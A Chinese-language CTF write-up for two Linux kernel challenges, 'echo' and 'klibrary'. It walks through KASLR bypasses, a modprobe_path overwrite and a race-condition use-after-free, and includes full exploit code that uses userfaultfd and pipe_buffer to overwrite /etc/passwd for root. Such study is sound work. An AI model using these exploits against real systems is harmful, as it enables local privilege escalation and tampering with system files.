文章目录
- 前言
- echo
- klibrary
前言
今天状态不好,很多事情都不想干,就做一做简单的题目
echo
- 内核版本:
v5.9.10 smap/smep/kaslr开启modprobe_path可写
题目给了源码,非常简单就是无限次的任意地址读写:
#include <linux/kernel.h>
#include <linux/syscalls.h>
#include <asm/uaccess_64.h>
// Syscall number : 548
SYSCALL_DEFINE2(echo, void*, to, void*, from) {
return copy_user_generic_unrolled(to, from, 8);
}
所以思路就毕竟简单了,先泄漏 kbase,然后任意地址覆写 modprobe_path 即可。所以这个题目关键的问题就在于如何 bypass kaslr
思路一:
当我们传入一个无效的地址时,copy_user_generic_unrolled 并不会导致内核 crash,当 copy_user_generic_unrolled 读取/写入失败时,其返回的是读取/写入失败的字节数,而成功时则返回 0
所以利用该特性,我们可以爆破 page_offset_base,然后 page_offset_base + 0x9d000 保存着 secondary_startup_64 的地址,所以可以利用其来泄漏 kbase
思路二:
内核版本 v5.9.10 的 cpu_entry_area 区域并没有参与随机化,并且该区域保存着一些内核地址:
gef> x/16gx 0xfffffe0000000000+4
0xfffffe0000000004: 0xffffffff9f008e00 0x00100a7000000000
0xfffffe0000000014: 0xffffffff9f008e03 0x00100f1000000000
0xfffffe0000000024: 0xffffffff9f008e02 0x00100a1000000000
0xfffffe0000000034: 0xffffffff9f00ee00 0x0010087000000000
0xfffffe0000000044: 0xffffffff9f00ee00 0x0010089000000000
0xfffffe0000000054: 0xffffffff9f008e00 0x001009f000000000
0xfffffe0000000064: 0xffffffff9f008e00 0x001008b000000000
0xfffffe0000000074: 0xffffffff9f008e00 0x00100aa000000000
最后 exp 如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
#include <sys/types.h>
void get_flag(){
system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag.txt' > /tmp/x");
system("chmod +x /tmp/x");
system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/dummy");
system("chmod +x /tmp/dummy");
system("/tmp/dummy");
sleep(0.3);
system("cat /flag.txt");
exit(0);
}
void exp1() {
uint64_t koffset = 0;
uint64_t start = 0xffff880000000000;
while (1) {
int64_t res = syscall(548, &koffset, start);
if (!res) break;
start += 0x10000000;
}
printf("[+] page_offset_base: %#llx\n", start);
syscall(548, &koffset, start+0x9d000);
koffset -= 0xffffffff81000030;
uint64_t modprobe_path = koffset + 0xffffffff81837cc0;
printf("[+] koffset: %#llx\n", koffset);
printf("[+] modprobe_path: %#llx\n", modprobe_path);
char path[8] = "/tmp/x";
syscall(548, modprobe_path, path);
get_flag();
}
void exp2() {
uint64_t koffset = 0;
syscall(548, &koffset, 0xfffffe0000000004);
koffset -= 0xffffffff81208e00;
uint64_t modprobe_path = koffset + 0xffffffff81837cc0;
printf("[+] koffset: %#llx\n", koffset);
printf("[+] modprobe_path: %#llx\n", modprobe_path);
char path[8] = "/tmp/x";
syscall(548, modprobe_path, path);
get_flag();
}
int main(int argc, char** argv, char** envp)
{
// exp1();
exp2();
return 0;
}
效果如下:
klibrary
- 内核版本:
v5.9.10,可以使用userfaultfd smap/smep/kaslr/kpti全开SLUB分配器,SLAB_HANDERN/RANDOM都没开,没有cg隔离,这可以帮助我们稳定的构造堆布局
题目给了源码,主要的问题就是 CMD_REMOVE_ALL 删除所有堆块操作与其它操作使得的是不同的锁,所以其存在对临界资源的竞争:
#include <linux/kernel.h>
#include <linux/fs.h>
#include <linux/mutex.h>
#include <linux/slab.h>
#include <linux/module.h>
#include <linux/uaccess.h>
#include <linux/device.h>
#define DEVICE_NAME "library"
#define CLASS_NAME "library"
#define BOOK_DESCRIPTION_SIZE 0x300
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
static DEFINE_MUTEX(ioctl_lock);
static DEFINE_MUTEX(remove_all_lock);
MODULE_AUTHOR("MaherAzzouzi");
MODULE_DESCRIPTION("A library implemented inside the kernel.");
MODULE_LICENSE("GPL");
static int major;
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg);
static int library_open(struct inode* inode, struct file *filp);
static int library_release(struct inode* inode, struct file *filp);
static struct file_operations library_fops = {
.owner = THIS_MODULE,
.unlocked_ioctl = library_ioctl,
.open = library_open,
.release = library_release
};
static struct class* library_class = NULL;
static struct device* library_device = NULL;
struct Book {
char book_description[BOOK_DESCRIPTION_SIZE]; // 0x300
unsigned long index;
struct Book* next;
struct Book* prev;
} *root;
struct Request {
unsigned long index;
char __user * userland_pointer;
};
unsigned long counter = 1;
static int add_book(unsigned long index);
static int remove_book(unsigned long index);
static noinline int remove_all(void);
static int add_description_to_book(struct Request request);
static int get_book_description(struct Request request);
static int library_open(struct inode* inode, struct file *filp) {
printk(KERN_INFO "[library] : manage your books safely here!\n");
return 0;
}
static int library_release(struct inode* inode, struct file *filp) {
printk(KERN_INFO "[library] : vulnerable device closed! try harder.\n");
remove_all();
return 0;
}
static long library_ioctl(struct file* file, unsigned int cmd, unsigned long arg) {
struct Request request;
if(copy_from_user((void*)&request, (void*)arg, sizeof(struct Request))) {
return -1;
}
// 这里使用的锁不同,所以 CMD_REMOVE_ALL 与其它操作可能存在竞争
if(cmd == CMD_REMOVE_ALL) {
mutex_lock(&remove_all_lock);
remove_all();
mutex_unlock(&remove_all_lock);
} else {
mutex_lock(&ioctl_lock);
switch(cmd) {
case CMD_ADD:
add_book(request.index);
break;
case CMD_REMOVE:
remove_book(request.index);
break;
case CMD_ADD_DESC:
add_description_to_book(request);
break;
case CMD_GET_DESC:
get_book_description(request);
break;
}
mutex_unlock(&ioctl_lock);
}
return 0;
}
static int add_book(unsigned long index) {
if(counter >= 10) {
printk(KERN_INFO "[library] can only hold 10 books here\n");
return -1;
}
struct Book *b, *p;
b = (struct Book*)kzalloc(sizeof(struct Book), GFP_KERNEL); // kmalloc-1k
if(b == NULL) {
printk(KERN_INFO "[library] : allocation failed! \n");
return -1;
}
b->index = index;
if(root == NULL) {
root = b;
root->prev = NULL;
root->next = NULL;
} else {
p = root;
while(p->next != NULL)
p = p->next;
p->next = b;
b->prev = p;
b->next = NULL;
}
counter++;
return 0;
}
static int remove_book(unsigned long index) {
struct Book *p, *prev, *next;
if(root == NULL) {
printk(KERN_INFO "[library] : no books in the library yet.");
return -1;
}
else if (root->index == index) {
p = root;
root = root->next;
kfree(p);
}
else {
p = root;
while(p != NULL && p->index != index)
p = p->next;
if(p == NULL) {
printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
}
prev = p->prev;
next = p->next;
prev->next = next;
next->prev = prev; // next maybe null ==> bug but not vuln
kfree(p);
}
counter--;
return 0;
}
static noinline int remove_all(void) {
struct Book *b, *p;
b = root;
while(b != NULL) {
p = b->next;
kfree(b);
b = p;
}
root = NULL;
counter = 1;
return 0;
}
static int add_description_to_book(struct Request request) {
struct Book* book = root;
if(book == NULL){
printk(KERN_INFO "[library] : no books in the library yet.\n");
return -1;
}
for(; book != NULL && book->index != request.index; book = book->next);
if(book == NULL) {
printk(KERN_INFO "[library] : the given index wasn't found\n");
return -1;
}
if(copy_from_user((void*)book->book_description,
(void*)(request.userland_pointer),
BOOK_DESCRIPTION_SIZE)) {
printk(KERN_INFO "[library] : copy_from_user failed for some reason.\n");
return -1;
}
}
static int get_book_description(struct Request request) {
struct Book* book;
book = root;
if(book == NULL) {
printk("[library] : no books yet, can not read the description.\n");
return -1;
}
while(book != NULL && book->index != request.index)
book = book->next;
if(book == NULL) {
printk(KERN_INFO "[library] : no book with the index you provided\n");
return -1;
}
if(copy_to_user((void*)request.userland_pointer,
(void*)book->book_description,
BOOK_DESCRIPTION_SIZE)) {
printk("[library] : copy_to_user failed!\n");
return -1;
}
}
static int __init init_library(void) {
major = register_chrdev(0, DEVICE_NAME, &library_fops);
if(major < 0) {
return -1;
}
library_class = class_create(THIS_MODULE, CLASS_NAME);
if(IS_ERR(library_class)) {
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
library_device = device_create(library_class,
0,
MKDEV(major, 0),
0,
DEVICE_NAME);
if(IS_ERR(library_device)) {
class_destroy(library_class);
unregister_chrdev(major, DEVICE_NAME);
return -1;
}
root = NULL;
mutex_init(&ioctl_lock);
mutex_init(&remove_all_lock);
printk(KERN_INFO "[library] : started!\n");
return 0;
}
static void __exit exit_library(void) {
device_destroy(library_class, MKDEV(major, 0));
class_unregister(library_class);
class_destroy(library_class);
unregister_chrdev(major, DEVICE_NAME);
mutex_destroy(&ioctl_lock);
mutex_destroy(&remove_all_lock);
printk(KERN_INFO "[library] : finished!\n");
}
module_init(init_library);
module_exit(exit_library);
这里简单说一下,在 remove_book 函数中存在一个实现问题:
static int remove_book(unsigned long index) {
struct Book *p, *prev, *next;
if(root == NULL) {
printk(KERN_INFO "[library] : no books in the library yet.");
return -1;
}
else if (root->index == index) {
p = root;
root = root->next;
kfree(p);
}
else {
p = root;
while(p != NULL && p->index != index)
p = p->next;
if(p == NULL) {
printk(KERN_INFO "[library] : can't remove %ld reason : not found\n", index);
}
prev = p->prev;
next = p->next;
prev->next = next;
next->prev = prev; // next maybe null ==> bug but not vuln
kfree(p);
}
counter--;
return 0;
}
这里堆块之间是使用双向链表连接,由于不是循环链表,所以尾堆块的 next 指针为 NULL,而在删除操作中没有对尾堆块进行单独的处理,所以这里可能存在对 NULL 的解引用,测试如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <ctype.h>
void err_exit(char *msg)
{
perror(msg);
sleep(2);
exit(EXIT_FAILURE);
}
struct Request {
unsigned long idx;
char *ptr;
};
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
int fd;
void add(int idx) {
struct Request req = { .idx = idx };
ioctl(fd, CMD_ADD, &req);
}
void dele(int idx) {
struct Request req = { .idx = idx };
ioctl(fd, CMD_REMOVE, &req);
}
int main(int argc, char** argv, char** envp)
{
fd = open("/dev/library", O_RDONLY);
if (fd < 0) err_exit("open /dev/library");
add(0);
add(1);
add(2);
dele(2);
return 0;
}
最后由于引用 NULL 指针从而导致 crash:
当然这个 bug 与漏洞利用无关,这里主要的问题还是锁机制的问题,remove_all 会释放所有的堆块,在对其进行操作时会获取 remove_all_lock 锁,而其它操作都是获取的 ioctl_lock 锁,所以这里存在竞争,我们可以在 edit 的过程中调用 remove_all 释放掉堆块,这时 edit 可能导致 UAF 写
这里我们可以获取 UAF 读和 UAF 写,首先说下 UAF 读,这里主要利用 get_book_description 函数:
static int get_book_description(struct Request request) {
struct Book* book;
book = root;
if(book == NULL) {
printk("[library] : no books yet, can not read the description.\n");
return -1;
}
while(book != NULL && book->index != request.index)
book = book->next;
if(book == NULL) {
printk(KERN_INFO "[library] : no book with the index you provided\n");
return -1;
}
if(copy_to_user((void*)request.userland_pointer, //【1】 <===== userfaultfd to stop
(void*)book->book_description,
BOOK_DESCRIPTION_SIZE)) {
printk("[library] : copy_to_user failed!\n");
return -1;
}
}
可以看到,我们可以在 【1】 处使用 userfaultfd 使其暂停,然后调用 remove_all 释放掉 book 堆块,然后分配其它对象占据该对象,最后恢复执行即可实现 UAF 读,UAF 写同理,其主要利用 add_description_to_book 函数,这里不再说明。然后这里的堆块大小为 kmalloc-1024
漏洞利用思路如下:
这里笔者测试发现无法创建新的命名空间,所以 USMA 打不了,然后 keyring 没有被编译,所以也用不了。最后笔者打的 dirty pipe,具体思路如下:
- 分配一个
book1 get_book_description(book1)读取内容,然后使用userfaultfd使其暂停,然后释放掉该book1,然后立刻分配pipe_buffer占据该释放堆块,然后恢复执行即可读取pipe_buffer的内容- 分配一个
book2 add_description_to_book(book2)写入内容,然后使用userfaultfd使其暂停,然后释放掉该book2,然后立刻分配pipe_buffer占据该释放堆块,然后恢复执行即可修改pipe_buffer的内容
这里笔者写 /bin/busybox 还是不行,所以还是给 /bin/busybox 赋予了一个 s 权限,尝试 dirty pipe 打 /etc/passwd,最后 exp 如下:
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <fcntl.h>
#include <signal.h>
#include <string.h>
#include <stdint.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <sched.h>
#include <linux/keyctl.h>
#include <ctype.h>
#include <pthread.h>
#include <sys/types.h>
#include <linux/userfaultfd.h>
#include <sys/sem.h>
#include <semaphore.h>
#include <poll.h>
#include <sys/ipc.h>
void err_exit(char *msg)
{
perror(msg);
sleep(2);
exit(EXIT_FAILURE);
}
void fail_exit(char *msg)
{
printf("\033[31m\033[1m[x] Error at: \033[0m%s\n", msg);
sleep(2);
exit(EXIT_FAILURE);
}
void info(char *msg)
{
printf("\033[32m\033[1m[+] %s\n\033[0m", msg);
}
void hexx(char *msg, size_t value)
{
printf("\033[32m\033[1m[+] %s: %#lx\n\033[0m", msg, value);
}
void binary_dump(char *desc, void *addr, int len) {
uint64_t *buf64 = (uint64_t *) addr;
uint8_t *buf8 = (uint8_t *) addr;
if (desc != NULL) {
printf("\033[33m[*] %s:\n\033[0m", desc);
}
for (int i = 0; i < len / 8; i += 4) {
printf(" %04x", i * 8);
for (int j = 0; j < 4; j++) {
i + j < len / 8 ? printf(" 0x%016lx", buf64[i + j]) : printf(" ");
}
printf(" ");
for (int j = 0; j < 32 && j + i * 8 < len; j++) {
printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
}
puts("");
}
}
void bind_core(int core)
{
cpu_set_t cpu_set;
CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);
printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}
struct Request {
unsigned long idx;
char *ptr;
};
#define CMD_ADD 0x3000
#define CMD_REMOVE 0x3001
#define CMD_REMOVE_ALL 0x3002
#define CMD_ADD_DESC 0x3003
#define CMD_GET_DESC 0x3004
int fd;
void add(int idx) {
struct Request req = { .idx = idx };
ioctl(fd, CMD_ADD, &req);
}
void dele(int idx) {
struct Request req = { .idx = idx };
ioctl(fd, CMD_REMOVE, &req);
}
void edit(int idx, char* buf) {
struct Request req = { .idx = idx, .ptr = buf };
ioctl(fd, CMD_ADD_DESC, &req);
}
void show(int idx, char* buf) {
struct Request req = { .idx = idx, .ptr = buf };
ioctl(fd, CMD_GET_DESC, &req);
}
void dele_all() {
struct Request req = { 0 };
ioctl(fd, CMD_REMOVE_ALL, &req);
}
void register_userfaultfd(pthread_t* moniter_thr, void* addr, long len, void* handler)
{
long uffd;
struct uffdio_api uffdio_api;
struct uffdio_register uffdio_register;
uffd = syscall(__NR_userfaultfd, O_NONBLOCK|O_CLOEXEC);
if (uffd < 0) perror("[X] syscall for __NR_userfaultfd"), exit(-1);
uffdio_api.api = UFFD_API;
uffdio_api.features = 0;
if (ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) perror("[X] ioctl-UFFDIO_API"), exit(-1);
uffdio_register.range.start = (long long)addr;
uffdio_register.range.len = len;
uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING;
if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) < 0) perror("[X] ioctl-UFFDIO_REGISTER"), exit(-1);
if (pthread_create(moniter_thr, NULL, handler, (void*)uffd) < 0)
puts("[X] pthread_create at register_userfaultfd"), exit(-1);
}
struct page;
struct pipe_inode_info;
struct pipe_buf_operations;
struct pipe_buffer {
struct page *page;
unsigned int offset, len;
const struct pipe_buf_operations *ops;
unsigned int flags;
unsigned long private;
};
//#define ATTACK_FILE "/bin/busybox"
#define ATTACK_FILE "/etc/passwd"
int attack_fd;
int pipe_fd[2][2];
struct pipe_buffer evil;
char copy_src[0x1000];
void* handler0(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler0");
dele_all();
uint64_t offset = 1;
if (pipe(pipe_fd[0]) < 0) err_exit("pipe");
if (splice(attack_fd, &offset, pipe_fd[0][1], NULL, 1, 0) < 0)
err_exit("splice");
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
void* handler1(void* arg)
{
struct uffd_msg msg;
struct uffdio_copy uffdio_copy;
long uffd = (long)arg;
for(;;)
{
int res;
struct pollfd pollfd;
pollfd.fd = uffd;
pollfd.events = POLLIN;
if (poll(&pollfd, 1, -1) < 0) puts("[X] error at poll"), exit(-1);
res = read(uffd, &msg, sizeof(msg));
if (res == 0) puts("[X] EOF on userfaultfd"), exit(-1);
if (res ==-1) puts("[X] read uffd in fault_handler_thread"), exit(-1);
if (msg.event != UFFD_EVENT_PAGEFAULT) puts("[X] Not pagefault"), exit(-1);
puts("[+] Now in userfaultfd handler1");
uint64_t offset = 1;
evil.flags = 0x10;
memcpy(copy_src, &evil, sizeof(struct pipe_buffer));
dele_all();
if (pipe(pipe_fd[1]) < 0) err_exit("pipe");
if (splice(attack_fd, &offset, pipe_fd[1][1], NULL, 1, 0) < 0)
err_exit("splice");
uffdio_copy.src = (long long)copy_src;
uffdio_copy.dst = (long long)msg.arg.pagefault.address & (~0xFFF);
uffdio_copy.len = 0x1000;
uffdio_copy.mode = 0;
uffdio_copy.copy = 0;
if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) < 0) puts("[X] ioctl-UFFDIO_COPY"), exit(-1);
}
}
int main(int argc, char** argv, char** envp)
{
bind_core(0);
int res;
char buf[0x4000] = { 0 };
char *uffd_buf0, *uffd_buf1;
pthread_t thr0, thr1;
fd = open("/dev/library", O_RDONLY);
if (fd < 0) err_exit("open /dev/library");
attack_fd = open(ATTACK_FILE, O_RDONLY);
if (attack_fd < 0) err_exit("open " ATTACK_FILE);
uffd_buf0 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
uffd_buf1 = mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (uffd_buf0 == MAP_FAILED || uffd_buf1 == MAP_FAILED) err_exit("mmap for uffd");
register_userfaultfd(&thr0, uffd_buf0, 0x1000, handler0);
register_userfaultfd(&thr1, uffd_buf1, 0x1000, handler1);
add(0);
show(0, uffd_buf0);
memcpy(&evil, uffd_buf0, sizeof(struct pipe_buffer));
binary_dump("pipe_buffer", &evil, sizeof(struct pipe_buffer));
add(1);
edit(1, uffd_buf1);
unsigned char elfcode[] = {
/*0x7f,*/ 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x97, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x97, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x68, 0x60, 0x66, 0x01, 0x01, 0x81, 0x34, 0x24, 0x01, 0x01, 0x01, 0x01,
0x48, 0xb8, 0x2f, 0x72, 0x6f, 0x6f, 0x74, 0x2f, 0x66, 0x6c, 0x50, 0x6a,
0x02, 0x58, 0x48, 0x89, 0xe7, 0x31, 0xf6, 0x0f, 0x05, 0x41, 0xba, 0xff,
0xff, 0xff, 0x7f, 0x48, 0x89, 0xc6, 0x6a, 0x28, 0x58, 0x6a, 0x01, 0x5f,
0x99, 0x0f, 0x05, 0xEB
};
// write(pipe_fd[1][1], elfcode, sizeof(elfcode));
char *ps = "ot::00:0:root:/root:/bin/sh\n";
write(pipe_fd[1][1], ps, sizeof(ps));
puts("[+] Please execute 'su root' to get root shell");
system("su root");
return 0;
}
效果如下:
这里的利用方式其实还有很多,可以选择打 tty_struct 结构体,或者劫持 pipe_buffer 打劫持程序执行流,但是这时得泄漏堆地址
